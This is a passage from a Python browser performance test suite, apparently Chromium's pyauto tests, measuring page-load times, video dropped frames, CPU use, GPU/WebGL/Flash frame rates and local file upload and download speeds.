# window.domAutomationController.send(
# JSON.stringify(window.__pyautoresult));
# """
# self.assertTrue(
# self.WaitUntil(_IsDone, timeout=1200, expect_retval=True,
# retry_sleep=5),
# msg='Timed out when waiting for Spaceport benchmark to complete.')
# results = eval(self.ExecuteJavascript(js_get_results, tab_index=1))
#
# for key in results:
# suite, test = key.split('.')
# value = float(results[key])
# self._OutputPerfGraphValue(test, value, 'ObjectsAt30FPS', suite)
# self._PrintSummaryResults('Overall', [float(x) for x in results.values()],
# 'ObjectsAt30FPS', 'Overall')
class LiveWebappLoadTest(BasePerfTest):
"""Tests that involve performance measurements of live webapps.
These tests connect to live webpages (e.g., Gmail, Calendar, Docs) and are
therefore subject to network conditions. These tests are meant to generate
"ball-park" numbers only (to see roughly how long things take to occur from a
user's perspective), and are not expected to be precise.
"""
def testNewTabGmail(self):
"""Measures time to open a tab to a logged-in Gmail account.
Timing starts right before the new tab is opened, and stops as soon as the
webpage displays the substring 'Last account activity:'.
"""
EXPECTED_SUBSTRING = 'Last account activity:'
def _SubstringExistsOnPage():
js = """
var frame = document.getElementById("canvas_frame");
var divs = frame.contentDocument.getElementsByTagName("div");
for (var i = 0; i < divs.length; ++i) {
if (divs[i].innerHTML.indexOf("%s") >= 0)
window.domAutomationController.send("true");
}
window.domAutomationController.send("false");
""" % EXPECTED_SUBSTRING
return self.ExecuteJavascript(js, tab_index=1)
def _RunSingleGmailTabOpen():
self._AppendTab('http://www.gmail.com')
self.assertTrue(self.WaitUntil(_SubstringExistsOnPage, timeout=120,
expect_retval='true', retry_sleep=0.10),
msg='Timed out waiting for expected Gmail string.')
self._LoginToGoogleAccount()
self._RunNewTabTest('NewTabGmail', _RunSingleGmailTabOpen,
'open_tab_live_webapp')
def testNewTabCalendar(self):
"""Measures time to open a tab to a logged-in Calendar account.
Timing starts right before the new tab is opened, and stops as soon as the
    webpage displays a div with the expected text 'Month'.
"""
EXPECTED_SUBSTRING = 'Month'
def _DivTitleStartsWith():
js = """
var divs = document.getElementsByTagName("div");
for (var i = 0; i < divs.length; ++i) {
if (divs[i].innerHTML == "%s")
window.domAutomationController.send("true");
}
window.domAutomationController.send("false");
""" % EXPECTED_SUBSTRING
return self.ExecuteJavascript(js, tab_index=1)
def _RunSingleCalendarTabOpen():
self._AppendTab('http://calendar.google.com')
self.assertTrue(self.WaitUntil(_DivTitleStartsWith, timeout=120,
expect_retval='true', retry_sleep=0.10),
msg='Timed out waiting for expected Calendar string.')
self._LoginToGoogleAccount()
self._RunNewTabTest('NewTabCalendar', _RunSingleCalendarTabOpen,
'open_tab_live_webapp')
def testNewTabDocs(self):
"""Measures time to open a tab to a logged-in Docs account.
Timing starts right before the new tab is opened, and stops as soon as the
    webpage displays the expected substring 'sort' (case insensitive).
"""
EXPECTED_SUBSTRING = 'sort'
def _SubstringExistsOnPage():
js = """
var divs = document.getElementsByTagName("div");
for (var i = 0; i < divs.length; ++i) {
if (divs[i].innerHTML.toLowerCase().indexOf("%s") >= 0)
window.domAutomationController.send("true");
}
window.domAutomationController.send("false");
""" % EXPECTED_SUBSTRING
return self.ExecuteJavascript(js, tab_index=1)
def _RunSingleDocsTabOpen():
self._AppendTab('http://docs.google.com')
self.assertTrue(self.WaitUntil(_SubstringExistsOnPage, timeout=120,
expect_retval='true', retry_sleep=0.10),
msg='Timed out waiting for expected Docs string.')
self._LoginToGoogleAccount()
self._RunNewTabTest('NewTabDocs', _RunSingleDocsTabOpen,
'open_tab_live_webapp')
class NetflixPerfTest(BasePerfTest, NetflixTestHelper):
"""Test Netflix video performance."""
def __init__(self, methodName='runTest', **kwargs):
pyauto.PyUITest.__init__(self, methodName, **kwargs)
NetflixTestHelper.__init__(self, self)
def tearDown(self):
self.SignOut()
pyauto.PyUITest.tearDown(self)
def testNetflixDroppedFrames(self):
"""Measures the Netflix video dropped frames/second. Runs for 60 secs."""
self.LoginAndStartPlaying()
self.CheckNetflixPlaying(self.IS_PLAYING,
'Player did not start playing the title.')
    # Ignore the first 10 seconds so video playback has time to smooth out.
time.sleep(10)
init_dropped_frames = self._GetVideoDroppedFrames()
dropped_frames = []
prev_dropped_frames = 0
for iteration in xrange(60):
# Ignoring initial dropped frames of first 10 seconds.
total_dropped_frames = self._GetVideoDroppedFrames() - init_dropped_frames
dropped_frames_last_sec = total_dropped_frames - prev_dropped_frames
dropped_frames.append(dropped_frames_last_sec)
logging.info('Iteration %d of %d: %f dropped frames in the last second',
iteration + 1, 60, dropped_frames_last_sec)
prev_dropped_frames = total_dropped_frames
# Play the video for some time.
time.sleep(1)
self._PrintSummaryResults('NetflixDroppedFrames', dropped_frames, 'frames',
'netflix_dropped_frames')
def testNetflixCPU(self):
"""Measures the Netflix video CPU usage. Runs for 60 seconds."""
self.LoginAndStartPlaying()
self.CheckNetflixPlaying(self.IS_PLAYING,
'Player did not start playing the title.')
    # Ignore the first 10 seconds so video playback has time to smooth out.
time.sleep(10)
init_dropped_frames = self._GetVideoDroppedFrames()
init_video_frames = self._GetVideoFrames()
cpu_usage_start = self._GetCPUUsage()
total_shown_frames = 0
# Play the video for some time.
time.sleep(60)
total_video_frames = self._GetVideoFrames() - init_video_frames
total_dropped_frames = self._GetVideoDroppedFrames() - init_dropped_frames
cpu_usage_end = self._GetCPUUsage()
fraction_non_idle_time = \
self._GetFractionNonIdleCPUTime(cpu_usage_start, cpu_usage_end)
# Counting extrapolation for utilization to play the video.
extrapolation_value = fraction_non_idle_time * \
(float(total_video_frames) + total_dropped_frames) / total_video_frames
logging.info('Netflix CPU extrapolation: %f', extrapolation_value)
self._OutputPerfGraphValue('NetflixCPUExtrapolation', extrapolation_value,
'extrapolation', 'netflix_cpu_extrapolation')
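# Illustrative sketch (not part of the original suite): the CPU "extrapolation"
# logged by testNetflixCPU (and testYoutubeCPU below) scales the fraction of
# non-idle CPU time by (shown + dropped) / shown frames, estimating the CPU
# cost of rendering every frame including the dropped ones. The helper name
# and the sample numbers are hypothetical.
def _example_cpu_extrapolation(fraction_non_idle_time, shown_frames,
                               dropped_frames):
  """Returns the extrapolated CPU utilization for full-frame-rate playback."""
  total_frames = float(shown_frames) + dropped_frames
  return fraction_non_idle_time * (total_frames / shown_frames)
# For example, 0.30 non-idle CPU with 1700 shown and 300 dropped frames
# extrapolates to 0.30 * 2000 / 1700, roughly 0.35.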
class YoutubePerfTest(BasePerfTest, YoutubeTestHelper):
"""Test Youtube video performance."""
def __init__(self, methodName='runTest', **kwargs):
pyauto.PyUITest.__init__(self, methodName, **kwargs)
YoutubeTestHelper.__init__(self, self)
def _VerifyVideoTotalBytes(self):
"""Returns true if video total bytes information is available."""
return self.GetVideoTotalBytes() > 0
def _VerifyVideoLoadedBytes(self):
"""Returns true if video loaded bytes information is available."""
return self.GetVideoLoadedBytes() > 0
def StartVideoForPerformance(self, video_id='zuzaxlddWbk'):
"""Start the test video with all required buffering."""
self.PlayVideoAndAssert(video_id)
self.ExecuteJavascript("""
ytplayer.setPlaybackQuality('hd720');
window.domAutomationController.send('');
""")
self.AssertPlayerState(state=self.is_playing,
msg='Player did not enter the playing state')
self.assertTrue(
self.WaitUntil(self._VerifyVideoTotalBytes, expect_retval=True),
msg='Failed to get video total bytes information.')
self.assertTrue(
self.WaitUntil(self._VerifyVideoLoadedBytes, expect_retval=True),
msg='Failed to get video loaded bytes information')
loaded_video_bytes = self.GetVideoLoadedBytes()
total_video_bytes = self.GetVideoTotalBytes()
self.PauseVideo()
logging.info('total_video_bytes: %f', total_video_bytes)
# Wait for the video to finish loading.
while total_video_bytes > loaded_video_bytes:
loaded_video_bytes = self.GetVideoLoadedBytes()
logging.info('loaded_video_bytes: %f', loaded_video_bytes)
time.sleep(1)
self.PlayVideo()
    # Ignore the first 10 seconds so video playback has time to smooth out.
time.sleep(10)
def testYoutubeDroppedFrames(self):
"""Measures the Youtube video dropped frames/second. Runs for 60 secs.
    This test measures Youtube video dropped frames for three different types
    of videos: slow, normal, and fast motion.
"""
youtube_video = {'Slow': 'VT1-sitWRtY',
'Normal': '2tqK_3mKQUw',
'Fast': '8ETDE0VGJY4',
}
for video_type in youtube_video:
logging.info('Running %s video.', video_type)
self.StartVideoForPerformance(youtube_video[video_type])
init_dropped_frames = self.GetVideoDroppedFrames()
total_dropped_frames = 0
dropped_fps = []
for iteration in xrange(60):
frames = self.GetVideoDroppedFrames() - init_dropped_frames
current_dropped_frames = frames - total_dropped_frames
dropped_fps.append(current_dropped_frames)
logging.info('Iteration %d of %d: %f dropped frames in the last '
'second', iteration + 1, 60, current_dropped_frames)
total_dropped_frames = frames
# Play the video for some time
time.sleep(1)
graph_description = 'YoutubeDroppedFrames' + video_type
self._PrintSummaryResults(graph_description, dropped_fps, 'frames',
'youtube_dropped_frames')
def testYoutubeCPU(self):
"""Measures the Youtube video CPU usage. Runs for 60 seconds.
Measures the Youtube video CPU usage (between 0 and 1), extrapolated to
    total frames in the video by taking dropped frames into account. For smooth
    video playback this number should be below roughly 0.5-1.0 on a
    hyperthreaded CPU.
"""
self.StartVideoForPerformance()
init_dropped_frames = self.GetVideoDroppedFrames()
logging.info('init_dropped_frames: %f', init_dropped_frames)
cpu_usage_start = self._GetCPUUsage()
total_shown_frames = 0
for sec_num in xrange(60):
# Play the video for some time.
time.sleep(1)
total_shown_frames = total_shown_frames + self.GetVideoFrames()
logging.info('total_shown_frames: %f', total_shown_frames)
total_dropped_frames = self.GetVideoDroppedFrames() - init_dropped_frames
logging.info('total_dropped_frames: %f', total_dropped_frames)
cpu_usage_end = self._GetCPUUsage()
fraction_non_idle_time = self._GetFractionNonIdleCPUTime(
cpu_usage_start, cpu_usage_end)
logging.info('fraction_non_idle_time: %f', fraction_non_idle_time)
total_frames = total_shown_frames + total_dropped_frames
# Counting extrapolation for utilization to play the video.
extrapolation_value = (fraction_non_idle_time *
(float(total_frames) / total_shown_frames))
logging.info('Youtube CPU extrapolation: %f', extrapolation_value)
# Video is still running so log some more detailed data.
self._LogProcessActivity()
self._OutputPerfGraphValue('YoutubeCPUExtrapolation', extrapolation_value,
'extrapolation', 'youtube_cpu_extrapolation')
class FlashVideoPerfTest(BasePerfTest):
"""General flash video performance tests."""
def FlashVideo1080P(self):
"""Measures total dropped frames and average FPS for a 1080p flash video.
This is a temporary test to be run manually for now, needed to collect some
performance statistics across different ChromeOS devices.
"""
# Open up the test webpage; it's assumed the test will start automatically.
webpage_url = 'http://www/~arscott/fl/FlashVideoTests.html'
self.assertTrue(self.AppendTab(pyauto.GURL(webpage_url)),
msg='Failed to append tab for webpage.')
# Wait until the test is complete.
js_is_done = """
window.domAutomationController.send(JSON.stringify(tests_done));
"""
self.assertTrue(
self.WaitUntil(
lambda: self.ExecuteJavascript(js_is_done, tab_index=1) == 'true',
timeout=300, expect_retval=True, retry_sleep=1),
msg='Timed out when waiting for test result.')
# Retrieve and output the test results.
js_results = """
window.domAutomationController.send(JSON.stringify(tests_results));
"""
test_result = eval(self.ExecuteJavascript(js_results, tab_index=1))
test_result[0] = test_result[0].replace('true', 'True')
test_result = eval(test_result[0]) # Webpage only does 1 test right now.
description = 'FlashVideo1080P'
result = test_result['averageFPS']
logging.info('Result for %s: %f FPS (average)', description, result)
self._OutputPerfGraphValue(description, result, 'FPS',
'flash_video_1080p_fps')
result = test_result['droppedFrames']
logging.info('Result for %s: %f dropped frames', description, result)
self._OutputPerfGraphValue(description, result, 'DroppedFrames',
'flash_video_1080p_dropped_frames')
class WebGLTest(BasePerfTest):
"""Tests for WebGL performance."""
def _RunWebGLTest(self, url, description, graph_name):
"""Measures FPS using a specified WebGL demo.
Args:
url: The string URL that, once loaded, will run the WebGL demo (default
WebGL demo settings are used, since this test does not modify any
settings in the demo).
description: A string description for this demo, used as a performance
value description. Should not contain any spaces.
graph_name: A string name for the performance graph associated with this
test. Only used on Chrome desktop.
"""
self.assertTrue(self.AppendTab(pyauto.GURL(url)),
msg='Failed to append tab for %s.' % description)
get_fps_js = """
var fps_field = document.getElementById("fps");
var result = -1;
if (fps_field)
result = fps_field.innerHTML;
window.domAutomationController.send(JSON.stringify(result));
"""
# Wait until we start getting FPS values.
self.assertTrue(
self.WaitUntil(
lambda: self.ExecuteJavascript(get_fps_js, tab_index=1) != '-1',
timeout=300, retry_sleep=1),
msg='Timed out when waiting for FPS values to be available.')
# Let the experiment run for 5 seconds before we start collecting perf
# measurements.
time.sleep(5)
# Collect the current FPS value each second for the next 30 seconds. The
# final result of this test will be the average of these FPS values.
fps_vals = []
for iteration in xrange(30):
fps = self.ExecuteJavascript(get_fps_js, tab_index=1)
fps = float(fps.replace('"', ''))
fps_vals.append(fps)
logging.info('Iteration %d of %d: %f FPS', iteration + 1, 30, fps)
time.sleep(1)
self._PrintSummaryResults(description, fps_vals, 'fps', graph_name)
def testWebGLAquarium(self):
"""Measures performance using the WebGL Aquarium demo."""
self._RunWebGLTest(
self.GetFileURLForDataPath('pyauto_private', 'webgl', 'aquarium',
'aquarium.html'),
'WebGLAquarium', 'webgl_demo')
def testWebGLField(self):
"""Measures performance using the WebGL Field demo."""
self._RunWebGLTest(
self.GetFileURLForDataPath('pyauto_private', 'webgl', 'field',
'field.html'),
'WebGLField', 'webgl_demo')
def testWebGLSpaceRocks(self):
"""Measures performance using the WebGL SpaceRocks demo."""
self._RunWebGLTest(
self.GetFileURLForDataPath('pyauto_private', 'webgl', 'spacerocks',
'spacerocks.html'),
'WebGLSpaceRocks', 'webgl_demo')
class GPUPerfTest(BasePerfTest):
"""Tests for GPU performance."""
def setUp(self):
"""Performs necessary setup work before running each test in this class."""
self._gpu_info_dict = self.EvalDataFrom(os.path.join(self.DataDir(),
'gpu', 'gpuperf.txt'))
self._demo_name_url_dict = self._gpu_info_dict['demo_info']
pyauto.PyUITest.setUp(self)
def _MeasureFpsOverTime(self, tab_index=0):
"""Measures FPS using a specified demo.
This function assumes that the demo is already loaded in the specified tab
index.
Args:
tab_index: The tab index, default is 0.
"""
# Let the experiment run for 5 seconds before we start collecting FPS
# values.
time.sleep(5)
# Collect the current FPS value each second for the next 10 seconds.
# Then return the average FPS value from among those collected.
fps_vals = []
for iteration in xrange(10):
fps = self.GetFPS(tab_index=tab_index)
fps_vals.append(fps['fps'])
time.sleep(1)
return Mean(fps_vals)
def _GetStdAvgAndCompare(self, avg_fps, description, ref_dict):
"""Computes the average and compare set of values with reference data.
Args:
avg_fps: Average fps value.
description: A string description for this demo, used as a performance
value description.
ref_dict: Dictionary which contains reference data for this test case.
Returns:
True, if the actual FPS value is within 10% of the reference FPS value,
or False, otherwise.
"""
std_fps = 0
status = True
# Load reference data according to platform.
platform_ref_dict = None
if self.IsWin():
platform_ref_dict = ref_dict['win']
elif self.IsMac():
platform_ref_dict = ref_dict['mac']
elif self.IsLinux():
platform_ref_dict = ref_dict['linux']
else:
      self.fail(msg='This platform is unsupported.')
std_fps = platform_ref_dict[description]
# Compare reference data to average fps.
# We allow the average FPS value to be within 10% of the reference
# FPS value.
if avg_fps < (0.9 * std_fps):
logging.info('FPS difference exceeds threshold for: %s', description)
logging.info(' Average: %f fps', avg_fps)
logging.info('Reference Average: %f fps', std_fps)
status = False
else:
      logging.info('Average FPS is at or above 90 percent of the '
                   'reference FPS for: %s', description)
logging.info(' Average: %f fps', avg_fps)
logging.info(' Reference Average: %f fps', std_fps)
return status
def testLaunchDemosParallelInSeparateTabs(self):
"""Measures performance of demos in different tabs in same browser."""
# Launch all the demos parallel in separate tabs
counter = 0
all_demos_passed = True
ref_dict = self._gpu_info_dict['separate_tab_ref_data']
# Iterate through dictionary and append all url to browser
for url in self._demo_name_url_dict.iterkeys():
self.assertTrue(
self.AppendTab(pyauto.GURL(self._demo_name_url_dict[url])),
msg='Failed to append tab for %s.' % url)
counter += 1
# Assert number of tab count is equal to number of tabs appended.
self.assertEqual(self.GetTabCount(), counter + 1)
# Measures performance using different demos and compare it golden
# reference.
for url in self._demo_name_url_dict.iterkeys():
avg_fps = self._MeasureFpsOverTime(tab_index=counter)
# Get the reference value of fps and compare the results
if not self._GetStdAvgAndCompare(avg_fps, url, ref_dict):
all_demos_passed = False
counter -= 1
self.assertTrue(
all_demos_passed,
msg='One or more demos failed to yield an acceptable FPS value')
def testLaunchDemosInSeparateBrowser(self):
"""Measures performance by launching each demo in a separate tab."""
# Launch demos in the browser
ref_dict = self._gpu_info_dict['separate_browser_ref_data']
all_demos_passed = True
for url in self._demo_name_url_dict.iterkeys():
self.NavigateToURL(self._demo_name_url_dict[url])
# Measures performance using different demos.
avg_fps = self._MeasureFpsOverTime()
self.RestartBrowser()
      # Get the standard value of fps and compare the results
if not self._GetStdAvgAndCompare(avg_fps, url, ref_dict):
all_demos_passed = False
self.assertTrue(
all_demos_passed,
msg='One or more demos failed to yield an acceptable FPS value')
def testLaunchDemosBrowseForwardBackward(self):
"""Measures performance of various demos in browser going back and forth."""
ref_dict = self._gpu_info_dict['browse_back_forward_ref_data']
url_array = []
desc_array = []
all_demos_passed = True
# Get URL/Description from dictionary and put in individual array
for url in self._demo_name_url_dict.iterkeys():
url_array.append(self._demo_name_url_dict[url])
desc_array.append(url)
for index in range(len(url_array) - 1):
# Launch demo in the Browser
if index == 0:
self.NavigateToURL(url_array[index])
# Measures performance using the first demo.
avg_fps = self._MeasureFpsOverTime()
status1 = self._GetStdAvgAndCompare(avg_fps, desc_array[index],
ref_dict)
# Measures performance using the second demo.
self.NavigateToURL(url_array[index + 1])
avg_fps = self._MeasureFpsOverTime()
status2 = self._GetStdAvgAndCompare(avg_fps, desc_array[index + 1],
ref_dict)
# Go Back to previous demo
self.TabGoBack()
# Measures performance for first demo when moved back
avg_fps = self._MeasureFpsOverTime()
status3 = self._GetStdAvgAndCompare(
avg_fps, desc_array[index] + '_backward',
ref_dict)
# Go Forward to previous demo
self.TabGoForward()
# Measures performance for second demo when moved forward
avg_fps = self._MeasureFpsOverTime()
status4 = self._GetStdAvgAndCompare(
avg_fps, desc_array[index + 1] + '_forward',
ref_dict)
if not all([status1, status2, status3, status4]):
all_demos_passed = False
self.assertTrue(
all_demos_passed,
msg='One or more demos failed to yield an acceptable FPS value')
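# Illustrative sketch (not part of the original suite): _GetStdAvgAndCompare
# above passes a demo whenever its average FPS is at least 90% of the platform
# reference value. The standalone helper below captures just that comparison;
# its name is hypothetical.
def _example_fps_within_tolerance(avg_fps, reference_fps, tolerance=0.10):
  """Returns True if avg_fps is no more than |tolerance| below reference_fps."""
  return avg_fps >= (1.0 - tolerance) * reference_fps
# _example_fps_within_tolerance(55.0, 60.0) -> True  (55 >= 54)
# _example_fps_within_tolerance(50.0, 60.0) -> False (50 < 54)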
class HTML5BenchmarkTest(BasePerfTest):
"""Tests for HTML5 performance."""
def testHTML5Benchmark(self):
"""Measures performance using the benchmark at html5-benchmark.com."""
self.NavigateToURL('http://html5-benchmark.com')
start_benchmark_js = """
benchmark();
window.domAutomationController.send("done");
"""
self.ExecuteJavascript(start_benchmark_js)
js_final_score = """
var score = "-1";
var elem = document.getElementById("score");
if (elem)
score = elem.innerHTML;
window.domAutomationController.send(score);
"""
# Wait for the benchmark to complete, which is assumed to be when the value
# of the 'score' DOM element changes to something other than '87485'.
self.assertTrue(
self.WaitUntil(
lambda: self.ExecuteJavascript(js_final_score) != '87485',
timeout=900, retry_sleep=1),
msg='Timed out when waiting for final score to be available.')
score = self.ExecuteJavascript(js_final_score)
logging.info('HTML5 Benchmark final score: %f', float(score))
self._OutputPerfGraphValue('HTML5Benchmark', float(score), 'score',
'html5_benchmark')
class FileUploadDownloadTest(BasePerfTest):
"""Tests that involve measuring performance of upload and download."""
def setUp(self):
"""Performs necessary setup work before running each test in this class."""
self._temp_dir = tempfile.mkdtemp()
self._test_server = PerfTestServer(self._temp_dir)
self._test_server_port = self._test_server.GetPort()
self._test_server.Run()
self.assertTrue(self.WaitUntil(self._IsTestServerRunning),
msg='Failed to start local performance test server.')
BasePerfTest.setUp(self)
def tearDown(self):
"""Performs necessary cleanup work after running each test in this class."""
BasePerfTest.tearDown(self)
self._test_server.ShutDown()
pyauto_utils.RemovePath(self._temp_dir)
def _IsTestServerRunning(self):
"""Determines whether the local test server is ready to accept connections.
Returns:
True, if a connection can be made to the local performance test server, or
False otherwise.
"""
conn = None
try:
conn = urllib2.urlopen('http://localhost:%d' % self._test_server_port)
return True
except IOError, e:
return False
finally:
if conn:
conn.close()
def testDownload100MBFile(self):
"""Measures the time to download a 100 MB file from a local server."""
CREATE_100MB_URL = (
'http://localhost:%d/create_file_of_size?filename=data&mb=100' %
self._test_server_port)
DOWNLOAD_100MB_URL = 'http://localhost:%d/data' % self._test_server_port
DELETE_100MB_URL = ('http://localhost:%d/delete_file?filename=data' %
self._test_server_port)
# Tell the local server to create a 100 MB file.
self.NavigateToURL(CREATE_100MB_URL)
# Cleaning up downloaded files is done in the same way as in downloads.py.
# We first identify all existing downloaded files, then remove only those
# new downloaded files that appear during the course of this test.
download_dir = self.GetDownloadDirectory().value()
orig_downloads = []
if os.path.isdir(download_dir):
orig_downloads = os.listdir(download_dir)
def _CleanupAdditionalFilesInDir(directory, orig_files):
"""Removes the additional files in the specified directory.
This function will remove all files from |directory| that are not
specified in |orig_files|.
Args:
directory: A string directory path.
orig_files: A list of strings representing the original set of files in
the specified directory.
"""
downloads_to_remove = []
if os.path.isdir(directory):
downloads_to_remove = [os.path.join(directory, name)
for name in os.listdir(directory)
if name not in orig_files]
for file_name in downloads_to_remove:
pyauto_utils.RemovePath(file_name)
def _DownloadFile(url):
self.DownloadAndWaitForStart(url)
self.WaitForAllDownloadsToComplete(timeout=2 * 60 * 1000) # 2 minutes.
timings = []
for iteration in range(self._num_iterations + 1):
elapsed_time = self._MeasureElapsedTime(
lambda: _DownloadFile(DOWNLOAD_100MB_URL), num_invocations=1)
# Ignore the first iteration.
if iteration:
timings.append(elapsed_time)
logging.info('Iteration %d of %d: %f milliseconds', iteration,
self._num_iterations, elapsed_time)
self.SetDownloadShelfVisible(False)
_CleanupAdditionalFilesInDir(download_dir, orig_downloads)
self._PrintSummaryResults('Download100MBFile', timings, 'milliseconds',
'download_file')
# Tell the local server to delete the 100 MB file.
self.NavigateToURL(DELETE_100MB_URL)
def testUpload50MBFile(self):
"""Measures the time to upload a 50 MB file to a local server."""
# TODO(dennisjeffrey): Replace the use of XMLHttpRequest in this test with
# FileManager automation to select the upload file when crosbug.com/17903
# is complete.
START_UPLOAD_URL = (
'http://localhost:%d/start_upload?mb=50' % self._test_server_port)
EXPECTED_SUBSTRING = 'Upload complete'
def _IsUploadComplete():
js = """
result = "";
var div = document.getElementById("upload_result");
if (div)
result = div.innerHTML;
window.domAutomationController.send(result);
"""
return self.ExecuteJavascript(js).find(EXPECTED_SUBSTRING) >= 0
def _RunSingleUpload():
self.NavigateToURL(START_UPLOAD_URL)
self.assertTrue(
self.WaitUntil(_IsUploadComplete, timeout=120, expect_retval=True,
retry_sleep=0.10),
msg='Upload failed to complete before the timeout was hit.')
timings = []
for iteration in range(self._num_iterations + 1):
elapsed_time = self._MeasureElapsedTime(_RunSingleUpload)
# Ignore the first iteration.
if iteration:
timings.append(elapsed_time)
logging.info('Iteration %d of %d: %f milliseconds', iteration,
self._num_iterations, elapsed_time)
self._PrintSummaryResults('Upload50MBFile', timings, 'milliseconds',
'upload_file')
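# Illustrative sketch (not part of the original suite): the download test above
# drives the create_file_of_size and delete_file GET endpoints of the local
# PerfTestServer (defined later in this file) by navigating to them. The same
# endpoints can be hit directly with urllib2, as _IsTestServerRunning already
# does for the root URL. The helper name and default arguments are
# hypothetical.
def _example_create_and_delete_file(port, filename='data', megabytes=100):
  """Asks the local test server to create and then delete a file."""
  import urllib2
  base = 'http://localhost:%d' % port
  urllib2.urlopen('%s/create_file_of_size?filename=%s&mb=%d' %
                  (base, filename, megabytes)).close()
  urllib2.urlopen('%s/delete_file?filename=%s' % (base, filename)).close()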
class FlashTest(BasePerfTest):
"""Tests to measure flash performance."""
def _RunFlashTestForAverageFPS(self, webpage_url, description, graph_name):
"""Runs a single flash test that measures an average FPS value.
Args:
webpage_url: The string URL to a webpage that will run the test.
description: A string description for this test.
graph_name: A string name for the performance graph associated with this
test. Only used on Chrome desktop.
"""
# Open up the test webpage; it's assumed the test will start automatically.
self.assertTrue(self.AppendTab(pyauto.GURL(webpage_url)),
msg='Failed to append tab for webpage.')
# Wait until the final result is computed, then retrieve and output it.
js = """
window.domAutomationController.send(
JSON.stringify(final_average_fps));
"""
self.assertTrue(
self.WaitUntil(
lambda: self.ExecuteJavascript(js, tab_index=1) != '-1',
timeout=300, expect_retval=True, retry_sleep=1),
msg='Timed out when waiting for test result.')
result = float(self.ExecuteJavascript(js, tab_index=1))
logging.info('Result for %s: %f FPS (average)', description, result)
self._OutputPerfGraphValue(description, result, 'FPS', graph_name)
def testFlashGaming(self):
"""Runs a simple flash gaming benchmark test."""
webpage_url = self.GetHttpURLForDataPath('pyauto_private', 'flash',
'FlashGamingTest2.html')
self._RunFlashTestForAverageFPS(webpage_url, 'FlashGaming', 'flash_fps')
def testFlashText(self):
"""Runs a simple flash text benchmark test."""
webpage_url = self.GetHttpURLForDataPath('pyauto_private', 'flash',
'FlashTextTest2.html')
self._RunFlashTestForAverageFPS(webpage_url, 'FlashText', 'flash_fps')
def testScimarkGui(self):
"""Runs the ScimarkGui benchmark tests."""
webpage_url = self.GetHttpURLForDataPath('pyauto_private', 'flash',
'scimarkGui.html')
self.assertTrue(self.AppendTab(pyauto.GURL(webpage_url)),
msg='Failed to append tab for webpage.')
js = 'window.domAutomationController.send(JSON.stringify(tests_done));'
self.assertTrue(
self.WaitUntil(
lambda: self.ExecuteJavascript(js, tab_index=1), timeout=300,
expect_retval='true', retry_sleep=1),
msg='Timed out when waiting for tests to complete.')
js_result = """
var result = {};
for (var i = 0; i < tests_results.length; ++i) {
var test_name = tests_results[i][0];
var mflops = tests_results[i][1];
var mem = tests_results[i][2];
result[test_name] = [mflops, mem]
}
window.domAutomationController.send(JSON.stringify(result));
"""
result = eval(self.ExecuteJavascript(js_result, tab_index=1))
for benchmark in result:
mflops = float(result[benchmark][0])
mem = float(result[benchmark][1])
if benchmark.endswith('_mflops'):
benchmark = benchmark[:benchmark.find('_mflops')]
logging.info('Results for ScimarkGui_%s:', benchmark)
logging.info(' %f MFLOPS', mflops)
logging.info(' %f MB', mem)
self._OutputPerfGraphValue('ScimarkGui-%s-MFLOPS' % benchmark, mflops,
'MFLOPS', 'scimark_gui_mflops')
self._OutputPerfGraphValue('ScimarkGui-%s-Mem' % benchmark, mem, 'MB',
'scimark_gui_mem')
class LiveGamePerfTest(BasePerfTest):
"""Tests to measure performance of live gaming webapps."""
def _RunLiveGamePerfTest(self, url, url_title_substring,
description, graph_name):
"""Measures performance metrics for the specified live gaming webapp.
This function connects to the specified URL to launch the gaming webapp,
waits for a period of time for the webapp to run, then collects some
performance metrics about the running webapp.
Args:
url: The string URL of the gaming webapp to analyze.
url_title_substring: A string that is expected to be a substring of the
webpage title for the specified gaming webapp. Used to verify that
the webapp loads correctly.
description: A string description for this game, used in the performance
value description. Should not contain any spaces.
graph_name: A string name for the performance graph associated with this
test. Only used on Chrome desktop.
"""
self.NavigateToURL(url)
loaded_tab_title = self.GetActiveTabTitle()
self.assertTrue(url_title_substring in loaded_tab_title,
msg='Loaded tab title missing "%s": "%s"' %
(url_title_substring, loaded_tab_title))
cpu_usage_start = self._GetCPUUsage()
# Let the app run for 1 minute.
time.sleep(60)
cpu_usage_end = self._GetCPUUsage()
fraction_non_idle_time = self._GetFractionNonIdleCPUTime(
cpu_usage_start, cpu_usage_end)
logging.info('Fraction of CPU time spent non-idle: %f',
fraction_non_idle_time)
self._OutputPerfGraphValue(description + 'CpuBusy', fraction_non_idle_time,
'Fraction', graph_name + '_cpu_busy')
v8_heap_stats = self.GetV8HeapStats()
v8_heap_size = v8_heap_stats['v8_memory_used'] / (1024.0 * 1024.0)
logging.info('Total v8 heap size: %f MB', v8_heap_size)
self._OutputPerfGraphValue(description + 'V8HeapSize', v8_heap_size, 'MB',
graph_name + '_v8_heap_size')
def testAngryBirds(self):
"""Measures performance for Angry Birds."""
self._RunLiveGamePerfTest('http://chrome.angrybirds.com', 'Angry Birds',
'AngryBirds', 'angry_birds')
class BasePageCyclerTest(BasePerfTest):
"""Page class for page cycler tests.
Derived classes must implement StartUrl().
Environment Variables:
PC_NO_AUTO: if set, avoids automatically loading pages.
"""
MAX_ITERATION_SECONDS = 60
TRIM_PERCENT = 20
DEFAULT_USE_AUTO = True
# Page Cycler lives in src/data/page_cycler rather than src/chrome/test/data
DATA_PATH = os.path.abspath(
os.path.join(BasePerfTest.DataDir(), os.pardir, os.pardir,
os.pardir, 'data', 'page_cycler'))
def setUp(self):
"""Performs necessary setup work before running each test."""
super(BasePageCyclerTest, self).setUp()
self.use_auto = 'PC_NO_AUTO' not in os.environ
@classmethod
def DataPath(cls, subdir):
return os.path.join(cls.DATA_PATH, subdir)
def ExtraChromeFlags(self):
"""Ensures Chrome is launched with custom flags.
Returns:
A list of extra flags to pass to Chrome when it is launched.
"""
# Extra flags required to run these tests.
# The first two are needed for the test.
# The plugins argument is to prevent bad scores due to pop-ups from
# running an old version of something (like Flash).
return (super(BasePageCyclerTest, self).ExtraChromeFlags() +
['--js-flags="--expose_gc"',
'--enable-file-cookies',
'--allow-outdated-plugins'])
def WaitUntilStarted(self, start_url):
"""Check that the test navigates away from the start_url."""
js_is_started = """
var is_started = document.location.href !== "%s";
window.domAutomationController.send(JSON.stringify(is_started));
""" % start_url
self.assertTrue(
self.WaitUntil(lambda: self.ExecuteJavascript(js_is_started) == 'true',
timeout=10),
msg='Timed out when waiting to leave start page.')
def WaitUntilDone(self, url, iterations):
"""Check cookies for "__pc_done=1" to know the test is over."""
def IsDone():
